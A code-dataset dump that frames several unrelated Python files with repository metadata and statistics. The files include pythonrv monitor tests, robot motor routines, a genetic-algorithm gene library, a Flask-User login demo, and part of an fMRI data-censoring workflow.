| 0
| 0
| 0.011834
| 0.028736
| 174
| 4
| 88
| 43.5
| 0.857988
| 0
| 0
| 0
| 0
| 0
| 0.356322
| 0.356322
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
3885a34a1591a31409208d336deb563db7ac625e
| 3,124
|
py
|
Python
|
ServerComponent/venv/Lib/site-packages/pythonrv/test/rv_next_test.py
|
CDU55/FakeNews
|
707bd48dd78851081d98ad21bbdadfc2720bd644
|
[
"MIT"
] | 2
|
2019-01-06T13:31:10.000Z
|
2020-12-11T04:05:44.000Z
|
pythonrv/test/rv_next_test.py
|
tgwizard/pythonrv
|
e50198cc6d48d8c6c6badbe8a1cd46eb0182839a
|
[
"MIT"
] | 37
|
2020-10-20T08:30:53.000Z
|
2020-12-22T13:15:45.000Z
|
pythonrv/test/rv_next_test.py
|
tgwizard/pythonrv
|
e50198cc6d48d8c6c6badbe8a1cd46eb0182839a
|
[
"MIT"
] | 1
|
2020-10-19T14:55:23.000Z
|
2020-10-19T14:55:23.000Z
|
# -*- coding: utf-8 -*-
import unittest
from pythonrv import rv
class TestEventNext(unittest.TestCase):
def test_event_next_called_should_be(self):
class M(object):
def m(self):
pass
@rv.monitor(m=M.m)
def spec(event):
event.next_called_should_be(event.fn.m)
a = M()
a.m()
a.m()
a.m()
def test_event_next_called_should_be_more(self):
class M(object):
def m(self):
pass
def n(self):
pass
@rv.monitor(m=M.m, n=M.n)
def spec(event):
event.next_called_should_be(event.fn.m)
a = M()
a.n()
a.m()
a.m()
with self.assertRaises(AssertionError) as e:
a.n()
self.assertEquals(e.exception.message, "Next function called should have been m")
def test_event_general_next(self):
class M(object):
def m(self):
pass
def n(self):
pass
@rv.monitor(m=M.m, n=M.n)
def spec(event):
event.next(after)
def after(event):
raise AssertionError("turtle power")
a = M()
a.m()
with self.assertRaises(AssertionError) as e:
a.m()
self.assertEquals(e.exception.message, "turtle power")
with self.assertRaises(AssertionError) as e:
a.m()
self.assertEquals(e.exception.message, "turtle power")
with self.assertRaises(AssertionError) as e:
a.m()
self.assertEquals(e.exception.message, "turtle power")
class TestMonitorNext(unittest.TestCase):
def test_monitor_next_simple(self):
class M(object):
def m(self):
pass
def raise_error(event):
raise ValueError("buffy")
@rv.monitor(m=M.m)
def spec(event):
event.fn.m.next(raise_error)
a = M()
a.m()
with self.assertRaises(ValueError) as e:
a.m()
self.assertEquals(e.exception.message, "buffy")
def test_monitor_next_multiple(self):
class M(object):
def m(self):
pass
def n(self):
pass
def raise_error(event):
raise ValueError("buffy")
@rv.monitor(m=M.m)
def spec(event):
event.fn.m.next(raise_error)
a = M()
a.m()
a.n()
a.n()
a.n()
with self.assertRaises(ValueError) as e:
a.m()
self.assertEquals(e.exception.message, "buffy")
def test_monitor_next_args(self):
class M(object):
def m(self):
pass
def raise_error(event, x, y, **kwargs):
raise ValueError(x + y + kwargs.get('z', -1))
@rv.monitor(m=M.m)
def spec(event):
event.fn.m.next(raise_error, (1, 2), dict(z=15))
a = M()
a.m()
with self.assertRaises(ValueError) as e:
a.m()
self.assertEquals(e.exception.message, 18)
| 24.598425
| 89
| 0.510243
| 389
| 3,124
| 4.007712
| 0.156812
| 0.02694
| 0.019243
| 0.020526
| 0.801796
| 0.780629
| 0.778063
| 0.736369
| 0.718409
| 0.710712
| 0
| 0.004061
| 0.369398
| 3,124
| 126
| 90
| 24.793651
| 0.78731
| 0.006722
| 0
| 0.82
| 0
| 0
| 0.034827
| 0
| 0
| 0
| 0
| 0
| 0.15
| 1
| 0.25
| false
| 0.09
| 0.02
| 0
| 0.35
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
c7f7a4a7c52dfef05d5b736e266553bf163ab419
| 5,379
|
py
|
Python
|
Robot/lib/commands.py
|
CRIMBOBJR/Auto_Robot
|
500fd25cc0cffabe5ff7ddc8f9d39c0cc340ae9d
|
[
"MIT"
] | null | null | null |
Robot/lib/commands.py
|
CRIMBOBJR/Auto_Robot
|
500fd25cc0cffabe5ff7ddc8f9d39c0cc340ae9d
|
[
"MIT"
] | 1
|
2022-01-22T10:24:05.000Z
|
2022-01-22T10:24:05.000Z
|
Robot/lib/commands.py
|
CRIMBOBJR/Auto_Robot
|
500fd25cc0cffabe5ff7ddc8f9d39c0cc340ae9d
|
[
"MIT"
] | null | null | null |
# This is where we keep all of the functions for the set routines.
from lib.motorCtrl import MotorControl
from time import sleep
class Commands:
def __init__(self, db):
self.db = db
self.motor = MotorControl()
# This is the function that watches the collection of
# datapoints that corresponds to the routine 1 function.
def Routine_1(self):
doc_ref = self.db.collection(u'Command').document(u'routine-1')
doc_watch = doc_ref.on_snapshot(self.r_1_on_snapshot)
# This is the function that will perform routine 1
# based on weather the function above saw a change.
def r_1_on_snapshot(self, dco_snapshot, changes, read_time):
for doc in dco_snapshot:
data = doc.to_dict()
drive = (data['drive'])
for driveDir in drive:
d = driveDir
direction = d['direction']
driveFor = d['driveFor']
if direction == 'N':
self.motor.Forward(driveFor)
elif direction == 'S':
self.motor.Backward(driveFor)
elif direction == 'E':
self.motor.Right(driveFor)
elif direction == 'W':
self.motor.Left(driveFor)
else:
print("nothing here")
print('direction ' + direction + ' | driveFor :' + str(driveFor))
sleep(driveFor)
print(">>>>>END<<<<<")
# This is the function that watches the collection of
# datapoints that corresponds to the rountine 2 function.
def Routine_2(self):
doc_ref = self.db.collection(u'Command').document(u'routine-2')
doc_watch = doc_ref.on_snapshot(self.r_2_on_snapshot)
# This is the function that will perform routine 2
# based on weather the function above saw a change.
def r_2_on_snapshot(self, dco_snapshot, changes, read_time):
for doc in dco_snapshot:
data = doc.to_dict()
drive = (data['drive'])
for driveDir in drive:
d = driveDir
direction = d['direction']
driveFor = d['driveFor']
if direction == 'N':
self.motor.Forward(driveFor)
elif direction == 'S':
self.motor.Backward(driveFor)
elif direction == 'E':
self.motor.Right(driveFor)
elif direction == 'W':
self.motor.Left(driveFor)
else:
print("nothing here")
print('direction ' + direction + ' | driveFor :' + str(driveFor))
sleep(driveFor)
print(">>>>>END<<<<<")
# This is the function that watches the collection of
# datapoints that corresponds to the rountine 3 function.
def Routine_3(self):
doc_ref = self.db.collection(u'Command').document(u'routine-3')
doc_watch = doc_ref.on_snapshot(self.r_3_on_snapshot)
# This is the function that will perform routine 3
# based on weather the function above saw a change.
def r_3_on_snapshot(self, dco_snapshot, changes, read_time):
for doc in dco_snapshot:
data = doc.to_dict()
drive = (data['drive'])
for driveDir in drive:
d = driveDir
direction = d['direction']
driveFor = d['driveFor']
if direction == 'N':
self.motor.Forward(driveFor)
elif direction == 'S':
self.motor.Backward(driveFor)
elif direction == 'E':
self.motor.Right(driveFor)
elif direction == 'W':
self.motor.Left(driveFor)
else:
print("nothing here")
print('direction ' + direction + ' | driveFor :' + str(driveFor))
sleep(driveFor)
print(">>>>>END<<<<<")
# This is the function that watches the collection of
# datapoints that corresponds to the rountine 4 function.
def Routine_4(self):
doc_ref = self.db.collection(u'Command').document(u'routine-4')
doc_watch = doc_ref.on_snapshot(self.r_4_on_snapshot)
# This is the function that will perform routine 4
# based on weather the function above saw a change.
def r_4_on_snapshot(self, dco_snapshot, changes, read_time):
for doc in dco_snapshot:
data = doc.to_dict()
drive = (data['drive'])
for driveDir in drive:
d = driveDir
direction = d['direction']
driveFor = d['driveFor']
if direction == 'N':
self.motor.Forward(driveFor)
elif direction == 'S':
self.motor.Backward(driveFor)
elif direction == 'E':
self.motor.Right(driveFor)
elif direction == 'W':
self.motor.Left(driveFor)
else:
print("nothing here")
print('direction ' + direction + ' | driveFor :' + str(driveFor))
sleep(driveFor)
print(">>>>>END<<<<<")
| 34.044304
| 81
| 0.528351
| 586
| 5,379
| 4.740614
| 0.141638
| 0.055076
| 0.090713
| 0.048956
| 0.905688
| 0.905688
| 0.905688
| 0.905688
| 0.863931
| 0.863931
| 0
| 0.007134
| 0.374605
| 5,379
| 157
| 82
| 34.261147
| 0.818668
| 0.167131
| 0
| 0.784314
| 0
| 0
| 0.080681
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088235
| false
| 0
| 0.019608
| 0
| 0.117647
| 0.117647
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2a2480483211d039c4091a6c5eceb8f4d652bf5f
| 7,165
|
py
|
Python
|
GeneLibrary.py
|
littley/pyvolution
|
9df7924ba3d62f7be301fe2d4820e6eae0da4947
|
[
"Apache-2.0"
] | 6
|
2018-11-27T10:32:07.000Z
|
2019-09-23T18:30:47.000Z
|
GeneLibrary.py
|
littley/pyvolution
|
9df7924ba3d62f7be301fe2d4820e6eae0da4947
|
[
"Apache-2.0"
] | null | null | null |
GeneLibrary.py
|
littley/pyvolution
|
9df7924ba3d62f7be301fe2d4820e6eae0da4947
|
[
"Apache-2.0"
] | 4
|
2017-05-20T10:11:46.000Z
|
2020-06-03T19:28:36.000Z
|
import random
import sys
from internal.GeneType import *
def FloatGeneType(description,
minVal=None,
maxVal=None,
generatorAverage=None,
generatorSTDEV=1,
averageMutation=0,
mutationSTDEV=1,
mutatorGene=None):
"""
Regurn a GeneType of type float configured as specified
:param description: the description/name of this gene
:type description: str
:param minVal: the minimum value allowed for this gene. Values that end up smaller will be rounded to the minVal
A value of None means that there is no minVal
:type minVal: float
:param maxVal: the maximum value allowed for this gene. Values that end up larger will be rounded to the maxVal
A value of None means that there is no maxVal
:type maxVal: float
:param generatorAverage: the average value that is generated for new genes
A value of None will cause a flat distribution to be used
:type generatorAverage: float
:param generatorSTDEV: the standard devation of the values generated for new genes
:type generatorSTDEV: float
:param averageMutation: the average amount that this gene changes during each mutation. You should have a VERY
good reason to set this to something other than the default value
:type averageMutation: float
:param mutationSTDEV: The standard deviation of the change during mutation.
:type mutationSTDEV: float
:param mutatorGene: the description of a gene. If not None, the value of this gene will be used instead of
the mutationSTDEV. If it is None then it is ignored
:type mutatorGene: str
:rtype: GeneType
"""
if minVal is None:
minVal = -1 * sys.maxint
if maxVal is None:
maxVal = sys.maxint
def generator():
if generatorAverage is None:
return random.uniform(minVal, maxVal)
else:
result = random.normalvariate(generatorAverage, generatorSTDEV)
if maxVal is not None:
result = min(result, maxVal)
if minVal is not None:
result = max(result, minVal)
return result
def mutator(originalValue, chromosome):
stdev = mutationSTDEV
if mutatorGene is not None:
stdev = chromosome[mutatorGene]
result = originalValue + random.normalvariate(averageMutation, stdev)
result = max(min(result, maxVal), minVal)
return result
return GeneType(generator, mutator, description)
##################################################################################################
def IntGeneType(description,
minVal=None,
maxVal=None,
generatorAverage=None,
generatorSTDEV=1,
averageMutation=0,
mutationSTDEV=1,
mutatorGene=None):
"""
Regurn a GeneType of type int configured as specified
:param description: the description/name of this gene
:type description: str
:param minVal: the minimum value allowed for this gene. Values that end up smaller will be rounded to the minVal
A value of None means that there is no minVal
:type minVal: int
:param maxVal: the maximum value allowed for this gene. Values that end up larger will be rounded to the maxVal
A value of None means that there is no maxVal
:type maxVal: int
:param generatorAverage: the average value that is generated for new genes
A value of None will cause a flat distribution to be used
:type generatorAverage: float
:param generatorSTDEV: the standard devation of the values generated for new genes
:type generatorSTDEV: float
:param averageMutation: the average amount that this gene changes during each mutation. You should have a VERY
good reason to set this to something other than the default value
:type averageMutation: float
:param mutationSTDEV: The standard deviation of the change during mutation.
:type mutationSTDEV: float
:param mutatorGene: the description of a gene. If not None, the value of this gene will be used instead of
the mutationSTDEV. If it is None then it is ignored
:type mutatorGene: str
:rtype: GeneType
"""
if minVal is None:
minVal = -1 * sys.maxint
if maxVal is None:
maxVal = sys.maxint
def generator():
if generatorAverage is None:
return int(round(random.uniform(minVal, maxVal)))
else:
result = random.normalvariate(generatorAverage, generatorSTDEV)
if maxVal is not None:
result = min(result, maxVal)
if minVal is not None:
result = max(result, minVal)
return int(round(result))
def mutator(originalValue, chromosome):
stdev = mutationSTDEV
if mutatorGene is not None:
stdev = chromosome[mutatorGene]
result = originalValue + random.normalvariate(averageMutation, stdev)
result = max(min(result, maxVal), minVal)
return int(round(result))
return GeneType(generator, mutator, description)
##################################################################################################
def BoolGeneType(description,
probabilityTrue=0.5,
mutationProbability=1.0):
"""
Return a gene of type bool configured as specified
:param description: the description/name of the gene
:type description: str
:param probabilityTrue: The probability that a randomly generated gene is true
:type probabilityTrue: float
:param mutationProbability: The probability that this gene will "flip" when mutated
:type mutationProbability: float
:rtype: GeneType
"""
def generator():
return random.uniform(0.0, 1.0) < probabilityTrue
def mutator(originalValue, chromosome):
if random.uniform(0.0, 1.0) <= mutationProbability:
return not originalValue
else:
return originalValue
return GeneType(generator, mutator, description)
##################################################################################################
def FloatInverseFit(description, maxVal=1, startVal=1):
"""
This gene does not mutate randomly, instead it is set to the inverse of the fitness
Good for mutator genes
:param description: the description/name of the GeneType
:param maxVal: the maximum value that this GeneType is allowed to hold
:param startVal: the starting value of this gene
"""
def generator():
return startVal
def mutator(originalValue, chromosome):
fitness = chromosome.getFitness()
if fitness != 0:
val = 1.0 / fitness
if val < maxVal:
return val
return originalValue
return GeneType(generator, mutator, description)
| 40.027933
| 117
| 0.617865
| 809
| 7,165
| 5.472188
| 0.153276
| 0.023492
| 0.010843
| 0.016264
| 0.812514
| 0.796928
| 0.78857
| 0.729388
| 0.729388
| 0.716512
| 0
| 0.004916
| 0.2903
| 7,165
| 179
| 118
| 40.027933
| 0.865683
| 0.474669
| 0
| 0.764706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.141176
| false
| 0
| 0.035294
| 0.023529
| 0.364706
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2a574e08564e89d384a3155d893696c2f1cc569a
| 3,255
|
py
|
Python
|
flask_login_sample/views/__init__.py
|
yoophi/flask-login-sample
|
ae76e2c396896f99b1ba8add44c752d5abc22c01
|
[
"MIT"
] | null | null | null |
flask_login_sample/views/__init__.py
|
yoophi/flask-login-sample
|
ae76e2c396896f99b1ba8add44c752d5abc22c01
|
[
"MIT"
] | null | null | null |
flask_login_sample/views/__init__.py
|
yoophi/flask-login-sample
|
ae76e2c396896f99b1ba8add44c752d5abc22c01
|
[
"MIT"
] | null | null | null |
from flask import Blueprint, render_template_string
from flask_user import login_required, roles_required
main = Blueprint('main', __name__)
@main.route('/')
def home_page():
return render_template_string("""
{% extends "flask_user_layout.html" %}
{% block content %}
<h2>{%trans%}Home page{%endtrans%}</h2>
<p><a href={{ url_for('user.register') }}>{%trans%}Register{%endtrans%}</a></p>
<p><a href={{ url_for('user.login') }}>{%trans%}Sign in{%endtrans%}</a></p>
<p><a href={{ url_for('main.home_page') }}>{%trans%}Home Page{%endtrans%}</a> (accessible to anyone)</p>
<p><a href={{ url_for('main.member_page') }}>{%trans%}Member Page{%endtrans%}</a> (login_required: member@example.com / Password1)</p>
<p><a href={{ url_for('main.admin_page') }}>{%trans%}Admin Page{%endtrans%}</a> (role_required: admin@example.com / Password1')</p>
<p><a href={{ url_for('user.logout') }}>{%trans%}Sign out{%endtrans%}</a></p>
{% endblock %}
""")
# The Members page is only accessible to authenticated users
@main.route('/members')
@login_required # Use of @login_required decorator
def member_page():
return render_template_string("""
{% extends "flask_user_layout.html" %}
{% block content %}
<h2>{%trans%}Members page{%endtrans%}</h2>
<p><a href={{ url_for('user.register') }}>{%trans%}Register{%endtrans%}</a></p>
<p><a href={{ url_for('user.login') }}>{%trans%}Sign in{%endtrans%}</a></p>
<p><a href={{ url_for('main.home_page') }}>{%trans%}Home Page{%endtrans%}</a> (accessible to anyone)</p>
<p><a href={{ url_for('main.member_page') }}>{%trans%}Member Page{%endtrans%}</a> (login_required: member@example.com / Password1)</p>
<p><a href={{ url_for('main.admin_page') }}>{%trans%}Admin Page{%endtrans%}</a> (role_required: admin@example.com / Password1')</p>
<p><a href={{ url_for('user.logout') }}>{%trans%}Sign out{%endtrans%}</a></p>
{% endblock %}
""")
# The Admin page requires an 'Admin' role.
@main.route('/admin')
@roles_required('Admin') # Use of @roles_required decorator
def admin_page():
return render_template_string("""
{% extends "flask_user_layout.html" %}
{% block content %}
<h2>{%trans%}Admin Page{%endtrans%}</h2>
<p><a href={{ url_for('user.register') }}>{%trans%}Register{%endtrans%}</a></p>
<p><a href={{ url_for('user.login') }}>{%trans%}Sign in{%endtrans%}</a></p>
<p><a href={{ url_for('main.home_page') }}>{%trans%}Home Page{%endtrans%}</a> (accessible to anyone)</p>
<p><a href={{ url_for('main.member_page') }}>{%trans%}Member Page{%endtrans%}</a> (login_required: member@example.com / Password1)</p>
<p><a href={{ url_for('main.admin_page') }}>{%trans%}Admin Page{%endtrans%}</a> (role_required: admin@example.com / Password1')</p>
<p><a href={{ url_for('user.logout') }}>{%trans%}Sign out{%endtrans%}</a></p>
{% endblock %}
""")
| 57.105263
| 150
| 0.560061
| 406
| 3,255
| 4.339901
| 0.140394
| 0.020431
| 0.061294
| 0.091941
| 0.80193
| 0.80193
| 0.80193
| 0.80193
| 0.80193
| 0.80193
| 0
| 0.004737
| 0.221813
| 3,255
| 56
| 151
| 58.125
| 0.69088
| 0.050691
| 0
| 0.702128
| 0
| 0.382979
| 0.865802
| 0.267423
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06383
| false
| 0.12766
| 0.042553
| 0.06383
| 0.170213
| 0.042553
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 10
|
2a7483a60f657fb57a78c8eaf79af4053d7688b9
| 35
|
py
|
Python
|
pydeap/datasets/__init__.py
|
Wlgls/pyDEAP
|
b7cec369cedd4a69ea82bc49a2fb8376260e4ad2
|
[
"Apache-2.0"
] | null | null | null |
pydeap/datasets/__init__.py
|
Wlgls/pyDEAP
|
b7cec369cedd4a69ea82bc49a2fb8376260e4ad2
|
[
"Apache-2.0"
] | null | null | null |
pydeap/datasets/__init__.py
|
Wlgls/pyDEAP
|
b7cec369cedd4a69ea82bc49a2fb8376260e4ad2
|
[
"Apache-2.0"
] | null | null | null |
from ._load_deap import load_deap
| 11.666667
| 33
| 0.828571
| 6
| 35
| 4.333333
| 0.666667
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 35
| 2
| 34
| 17.5
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
aade78f5d472edef9a3d28a0ac38ebfe1562e211
| 417
|
py
|
Python
|
social_reward_function/test_system.py
|
TomKingsfordUoA/social-reward-function
|
55d1f5a94f0266a83b7de8f060203fdb23b2fac4
|
[
"MIT"
] | 1
|
2021-08-12T03:36:01.000Z
|
2021-08-12T03:36:01.000Z
|
social_reward_function/test_system.py
|
TomKingsfordUoA/social-reward-function
|
55d1f5a94f0266a83b7de8f060203fdb23b2fac4
|
[
"MIT"
] | 14
|
2021-08-11T00:32:46.000Z
|
2021-08-24T00:34:25.000Z
|
social_reward_function/test_system.py
|
TomKingsfordUoA/social-robotics-reward
|
55d1f5a94f0266a83b7de8f060203fdb23b2fac4
|
[
"MIT"
] | null | null | null |
import pytest
@pytest.mark.xfail
def test_srr_file() -> None:
"""
Performs a smoke test that srr with a file actually produces a roughly correct reward signal.
"""
raise NotImplementedError()
@pytest.mark.xfail
def test_srr_webcam() -> None:
"""
Performs a smoke test that srr with a (mock) webcam actually produces a roughly correct reward signal.
"""
raise NotImplementedError()
| 23.166667
| 106
| 0.70024
| 55
| 417
| 5.236364
| 0.436364
| 0.069444
| 0.104167
| 0.125
| 0.875
| 0.875
| 0.701389
| 0.701389
| 0.701389
| 0
| 0
| 0
| 0.213429
| 417
| 17
| 107
| 24.529412
| 0.878049
| 0.470024
| 0
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| true
| 0
| 0.142857
| 0
| 0.428571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2aafb9f6f6a94dbbca502ba2311dcb1459932882
| 25,357
|
py
|
Python
|
func_preproc/DataCensorer.py
|
spisakt/PUMI
|
bea29696aa90e5581f08919e1a2cd9f569284984
|
[
"BSD-3-Clause"
] | 5
|
2018-06-12T08:17:13.000Z
|
2022-02-25T20:07:00.000Z
|
func_preproc/DataCensorer.py
|
spisakt/PUMI
|
bea29696aa90e5581f08919e1a2cd9f569284984
|
[
"BSD-3-Clause"
] | null | null | null |
func_preproc/DataCensorer.py
|
spisakt/PUMI
|
bea29696aa90e5581f08919e1a2cd9f569284984
|
[
"BSD-3-Clause"
] | 2
|
2020-10-19T15:27:28.000Z
|
2021-06-04T17:02:27.000Z
|
def datacens_workflow_percent(SinkTag="func_preproc", wf_name="data_censoring"):
"""
Modified version of CPAC.scrubbing.scrubbing +
CPAC.generate_motion_statistics.generate_motion_statistics +
CPAC.func_preproc.func_preproc
`source: https://fcp-indi.github.io/docs/developer/_modules/CPAC/scrubbing/scrubbing.html`
`source: https://fcp-indi.github.io/docs/developer/_modules/CPAC/generate_motion_statistics/generate_motion_statistics.html`
`source: https://fcp-indi.github.io/docs/developer/_modules/CPAC/func_preproc/func_preproc.html`
Description:
Do the data censoring on the 4D functional data. First, it calculates the framewise displacement according to Power's method. Second, it
indexes the volumes which FD is in the upper part in percent(determined by the threshold variable which is 5% by default). Thirdly, it excludes those volumes and one volume
before and 2 volumes after the indexed volume. The workflow returns a 4D scrubbed functional data.
Workflow inputs:
:param func: The reoriented,motion occrected, nuissance removed and bandpass filtered functional file.
:param FD: the frame wise displacement calculated by the MotionCorrecter.py script
:param threshold: threshold of FD volumes which should be excluded
:param SinkDir:
:param SinkTag: The output directory in which the returned images (see workflow outputs) could be found in a subdirectory directory specific for this workflow..
Workflow outputs:
:return: datacens_workflow - workflow
Balint Kincses
kincses.balint@med.u-szeged.hu
2018
References
----------
.. [1] Power, J. D., Barnes, K. A., Snyder, A. Z., Schlaggar, B. L., & Petersen, S. E. (2012). Spurious
but systematic correlations in functional connectivity MRI networks arise from subject motion. NeuroImage, 59(3),
2142-2154. doi:10.1016/j.neuroimage.2011.10.018
.. [2] Power, J. D., Barnes, K. A., Snyder, A. Z., Schlaggar, B. L., & Petersen, S. E. (2012). Steps
toward optimizing motion artifact removal in functional connectivity MRI; a reply to Carp.
NeuroImage. doi:10.1016/j.neuroimage.2012.03.017
.. [3] Jenkinson, M., Bannister, P., Brady, M., Smith, S., 2002. Improved optimization for the robust
and accurate linear registration and motion correction of brain images. Neuroimage 17, 825-841.
"""
import os
import nipype
import nipype.pipeline as pe
import nipype.interfaces.utility as utility
import nipype.interfaces.io as io
import PUMI.utils.globals as globals
import PUMI.utils.QC as qc
SinkDir = os.path.abspath(globals._SinkDir_ + "/" + SinkTag)
if not os.path.exists(SinkDir):
os.makedirs(SinkDir)
# Identitiy mapping for input variables
inputspec = pe.Node(utility.IdentityInterface(fields=['func',
'FD',
'threshold']),
name='inputspec')
inputspec.inputs.threshold = 5
#TODO_ready check CPAC.generate_motion_statistics.generate_motion_statistics script. It may use the FD of Jenkinson to index volumes which violate the upper threhold limit, no matter what we set.
# - we use the power method to calculate FD
# Determine the indices of the upper part (which is defined by the threshold, deafult 5%) of values based on their FD values
calc_upprperc = pe.MapNode(utility.Function(input_names=['in_file',
'threshold'],
output_names=['frames_in_idx', 'frames_out_idx', 'percentFD', 'out_file', 'nvol'],
function=calculate_upperpercent),
iterfield=['in_file'],
name='calculate_upperpercent')
# Generate the weird input for the scrubbing procedure which is done in afni
craft_scrub_input = pe.MapNode(utility.Function(input_names=['scrub_input', 'frames_in_1D_file'],
output_names=['scrub_input_string'],
function=get_indx),
iterfield=['scrub_input', 'frames_in_1D_file'],
name='scrubbing_craft_input_string')
# Scrub the image
scrubbed_preprocessed = pe.MapNode(utility.Function(input_names=['scrub_input'],
output_names=['scrubbed_image'],
function=scrub_image),
iterfield=['scrub_input'],
name='scrubbed_preprocessed')
myqc = qc.timecourse2png("timeseries", tag="040_censored")
outputspec = pe.Node(utility.IdentityInterface(fields=['scrubbed_image', 'FD']),
name='outputspec')
# save data out with Datasink
ds=pe.Node(interface=io.DataSink(),name='ds')
ds.inputs.base_directory=SinkDir
#TODO_ready: some plot for qualitiy checking
# Create workflow
analysisflow = pe.Workflow(wf_name)
###Calculating mean Framewise Displacement (FD) as Power et al., 2012
# Calculating frames to exclude and include after scrubbing
analysisflow.connect(inputspec, 'FD', calc_upprperc, 'in_file')
analysisflow.connect(inputspec, 'threshold', calc_upprperc, 'threshold')
# Create the proper format for the scrubbing procedure
analysisflow.connect(calc_upprperc, 'frames_in_idx', craft_scrub_input, 'frames_in_1D_file')
analysisflow.connect(calc_upprperc, 'out_file', ds, 'percentFD') # TODO save this in separet folder for QC
analysisflow.connect(inputspec, 'func', craft_scrub_input, 'scrub_input')
# Do the scubbing
analysisflow.connect(craft_scrub_input, 'scrub_input_string', scrubbed_preprocessed, 'scrub_input')
# Output
analysisflow.connect(scrubbed_preprocessed, 'scrubbed_image', outputspec, 'scrubbed_image')
analysisflow.connect(inputspec, 'FD', outputspec, 'FD') #TODO: scrub FD file, as well
# Save a few files
#analysisflow.connect(scrubbed_preprocessed, 'scrubbed_image', ds, 'scrubbed_image')
#analysisflow.connect(calc_upprperc, 'percentFD', ds, 'scrubbed_image.@numberofvols')
analysisflow.connect(scrubbed_preprocessed, 'scrubbed_image', myqc, 'inputspec.func')
return analysisflow
def datacens_workflow_threshold(SinkTag="func_preproc", wf_name="data_censoring", ex_before=1, ex_after=2):
"""
Modified version of CPAC.scrubbing.scrubbing +
CPAC.generate_motion_statistics.generate_motion_statistics +
CPAC.func_preproc.func_preproc
`source: https://fcp-indi.github.io/docs/developer/_modules/CPAC/scrubbing/scrubbing.html`
`source: https://fcp-indi.github.io/docs/developer/_modules/CPAC/generate_motion_statistics/generate_motion_statistics.html`
`source: https://fcp-indi.github.io/docs/developer/_modules/CPAC/func_preproc/func_preproc.html`
Description:
Do the data censoring on the 4D functional data. First, it calculates the framewise displacement according to Power's method. Second, it
indexes the volumes which FD is in the upper part in percent(determined by the threshold variable which is 5% by default). Thirdly, it excludes those volumes and one volume
before and 2 volumes after the indexed volume. The workflow returns a 4D scrubbed functional data.
Workflow inputs:
:param func: The reoriented,motion occrected, nuissance removed and bandpass filtered functional file.
:param FD: the frame wise displacement calculated by the MotionCorrecter.py script
:param threshold: threshold of FD volumes which should be excluded
:param SinkDir:
:param SinkTag: The output directory in which the returned images (see workflow outputs) could be found in a subdirectory directory specific for this workflow..
Workflow outputs:
:return: datacens_workflow - workflow
Balint Kincses
kincses.balint@med.u-szeged.hu
2018
References
----------
.. [1] Power, J. D., Barnes, K. A., Snyder, A. Z., Schlaggar, B. L., & Petersen, S. E. (2012). Spurious
but systematic correlations in functional connectivity MRI networks arise from subject motion. NeuroImage, 59(3),
2142-2154. doi:10.1016/j.neuroimage.2011.10.018
.. [2] Power, J. D., Barnes, K. A., Snyder, A. Z., Schlaggar, B. L., & Petersen, S. E. (2012). Steps
toward optimizing motion artifact removal in functional connectivity MRI; a reply to Carp.
NeuroImage. doi:10.1016/j.neuroimage.2012.03.017
.. [3] Jenkinson, M., Bannister, P., Brady, M., Smith, S., 2002. Improved optimization for the robust
and accurate linear registration and motion correction of brain images. Neuroimage 17, 825-841.
"""
import os
import nipype
import nipype.pipeline as pe
import nipype.interfaces.utility as utility
import nipype.interfaces.io as io
import PUMI.utils.utils_convert as utils_convert
import PUMI.utils.globals as globals
import PUMI.utils.QC as qc
SinkDir = os.path.abspath(globals._SinkDir_ + "/" + SinkTag)
if not os.path.exists(SinkDir):
os.makedirs(SinkDir)
# Identitiy mapping for input variables
inputspec = pe.Node(utility.IdentityInterface(fields=['func',
'FD',
'threshold']),
